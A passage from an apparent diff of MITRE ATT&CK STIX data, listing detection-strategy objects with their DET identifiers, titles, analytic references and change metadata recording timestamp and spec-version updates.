+                        "x-mitre-analytic--89cfa3ac-22c9-462f-a6a5-b142124e22a5",
+                        "x-mitre-analytic--18cf5cf7-f46b-4258-a0aa-503881c9c88e"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.696000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--dcf2474e-0774-40da-b7e6-f4b60d0ea62f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.695000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0035",
+                            "external_id": "DET0035"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Bidirectional Web Service C2 Channels via Process & Network Correlation",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--27bd3e33-9a61-4dfb-9fba-205a6c880264",
+                        "x-mitre-analytic--1edab644-3ec0-4c5d-bc26-18744fbc7a6e",
+                        "x-mitre-analytic--5935bda3-8d4d-44b4-aca4-8b40cf45f686"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.695000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--eec6a137-c506-4654-8780-8e3028f3fd28",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.697000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0523",
+                            "external_id": "DET0523"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Code Signing Policy Modification (Windows & macOS)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--83067587-4426-44cb-89de-f2b948c91104",
+                        "x-mitre-analytic--7853421f-8eb4-49c3-9943-077430b97037"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.697000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--110a934e-881a-4e42-9619-b6de30f4a39e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.669000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0336",
+                            "external_id": "DET0336"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Compromise of Host Software Binaries",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--e2ebd04e-074d-4b90-b94c-a43048b1c3ac",
+                        "x-mitre-analytic--9b2ff34a-1967-46a9-b355-f9584a0715b5",
+                        "x-mitre-analytic--88eaf8ce-b48d-4329-a147-dd5d065cead2",
+                        "x-mitre-analytic--fa36a169-1cca-4887-b362-e3cceb02414f"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.669000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--4cd84c0e-b125-4576-9441-57c1664bf014",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.677000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0030",
+                            "external_id": "DET0030"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Conditional Access Policy Modification in Identity and Cloud Platforms",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--b88f87d2-4a64-44a2-937e-85a929203843",
+                        "x-mitre-analytic--9eb2a081-e252-4009-a16e-90c9a85f70f1"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.677000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--6c9e1f65-7d75-4091-b97d-e5f88ed12812",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.680000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0250",
+                            "external_id": "DET0250"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Credential Discovery via Windows Registry Enumeration",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--4c744ac0-ba25-4b42-8397-9b398ba55eb8"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.680000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--1a273fde-f4fc-4ca0-94d4-7df285167b5e",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.671000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0430",
+                            "external_id": "DET0430"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Credentials Access from Password Stores",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--de4fe01d-96d7-4258-a1d6-6958fe50a4ed",
+                        "x-mitre-analytic--571b10ce-fb7d-492e-b05a-23649ae14148",
+                        "x-mitre-analytic--2bec56a7-957c-44b4-b730-00dd55ff99f8",
+                        "x-mitre-analytic--2c8326bd-dd59-4715-87ef-dc3bdef919fb"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.671000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--9f227978-8d56-406f-9d50-ef10aae1bf77",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.686000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0468",
+                            "external_id": "DET0468"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect DHCP Spoofing Across Linux, Windows, and macOS",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--780021a3-d3e6-4c5b-a976-1c3715b990e2",
+                        "x-mitre-analytic--05d8ce15-eaeb-47f5-abb7-8f8868dd8aaa",
+                        "x-mitre-analytic--4f2bc468-a57d-44e9-b9cd-d491df6b0daf"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.686000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--61585647-dcc0-4c46-9333-c59796997826",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.679000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0061",
+                            "external_id": "DET0061"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Default File Association Hijack via Registry & Execution Correlation on Windows",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--3ac58f14-32d6-4ce2-8aa7-e7c429dd6405"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.679000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--cfedfc6c-6e31-481b-be1e-e23a760fec44",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:30:18.390000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0187",
+                            "external_id": "DET0187"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Disabled Windows Event Log",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--705168ad-1701-453c-9aea-c75029492b89"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:30:18.390000+00:00\", \"old_value\": \"2026-04-24T20:24:45.876Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--3ac249d7-5e15-47b4-a507-18d94b11de4d",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.674000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0271",
+                            "external_id": "DET0271"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Domain Controller Authentication Process Modification (Skeleton Key)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--40882c73-344f-4138-894e-049b9bb1f460"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.674000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--b376d299-69ef-444a-8ba1-15a6c7049605",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.688000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0379",
+                            "external_id": "DET0379"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Evil Twin Wi-Fi Access Points on Network Devices",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--670462e3-6c3e-4779-af75-2a0424a5d221"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.688000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--c0a23061-c4f3-4003-9e81-e81d50b6d1e2",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.691000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0028",
+                            "external_id": "DET0028"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Excessive or Unauthorized Bandwidth Usage for Botnet, Proxyjacking, or Scanning Purposes",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--c699a4ee-83dd-48d8-94ae-658204066ae9",
+                        "x-mitre-analytic--10e9d109-0a17-41cd-9d0b-67c679bc94b7",
+                        "x-mitre-analytic--35a5d72b-6c69-498a-9118-14cd6c85a57a",
+                        "x-mitre-analytic--2fe9bf69-b1a8-4c60-8b20-c11054d31158",
+                        "x-mitre-analytic--b0d018e2-0384-4e27-92ed-c9b181999fa9"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.691000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--b45310bb-d520-43b3-8758-e9d5a9738429",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.689000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0022",
+                            "external_id": "DET0022"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Forced SMB/WebDAV Authentication via lure files and outbound NTLM",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--f2064dd1-8cdb-472e-b187-8d1ef18fb059"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.689000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--cbf5f016-0801-4861-93d8-d372645778d5",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.692000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0144",
+                            "external_id": "DET0144"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Forged Kerberos Golden Tickets (T1558.001)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--fd614a66-7e99-4a69-9070-3c11036f0335"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.692000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--77e72172-b088-4a98-bddd-ca04cbfc32ee",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.681000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0241",
+                            "external_id": "DET0241"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Forged Kerberos Silver Tickets (T1558.002)",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--88ece783-08bc-41e6-a000-a63f540768cc"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.681000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--62d7a748-dee5-46c7-b61c-77f57f371b4f",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.679000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0288",
+                            "external_id": "DET0288"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Gatekeeper Bypass via Quarantine Flag and Trust Control Manipulation",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--b6516e8b-fd18-4c92-8701-1762d8321168"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
+                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "x_mitre_version": "1.0",
+                    "detailed_diff": "{\"dictionary_item_added\": {\"root['revoked']\": false}, \"dictionary_item_removed\": {\"root['spec_version']\": \"2.1\"}, \"values_changed\": {\"root['created']\": {\"new_value\": \"2025-10-21 15:10:28.402000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}, \"root['modified']\": {\"new_value\": \"2026-05-12 16:34:50.679000+00:00\", \"old_value\": \"2025-10-21T15:10:28.402Z\"}}}",
+                    "previous_version": "1.0"
+                },
+                {
+                    "type": "x-mitre-detection-strategy",
+                    "id": "x-mitre-detection-strategy--6b681059-99f7-46ff-bd36-96fd414074d4",
+                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+                    "created": "2025-10-21 15:10:28.402000+00:00",
+                    "modified": "2026-05-12 16:34:50.680000+00:00",
+                    "revoked": false,
+                    "external_references": [
+                        {
+                            "source_name": "mitre-attack",
+                            "url": "https://attack.mitre.org/detectionstrategies/DET0293",
+                            "external_id": "DET0293"
+                        }
+                    ],
+                    "object_marking_refs": [
+                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+                    ],
+                    "name": "Detect Hybrid Identity Authentication Process Modification",
+                    "x_mitre_analytic_refs": [
+                        "x-mitre-analytic--344f0add-d372-4e0e-88c6-f48e6b424434",
+                        "x-mitre-analytic--e1063b92-9be0-4d25-9df5-bae4171c8153",
+                        "x-mitre-analytic--80e4f847-a149-423b-a179-cbcf4afd06b9",
+                        "x-mitre-analytic--07b8a45e-6435-4c67-ac15-47db21c1d1b9",
+                        "x-mitre-analytic--bf166688-0c78-43a5-bb87-3159c1b86584"
+                    ],
+                    "x_mitre_attack_spec_version": "3.3.0",
+                    "x_mitre_deprecated": false,
+                    "x_mitre_domains": [
+                        "enterprise-attack"
+                    ],
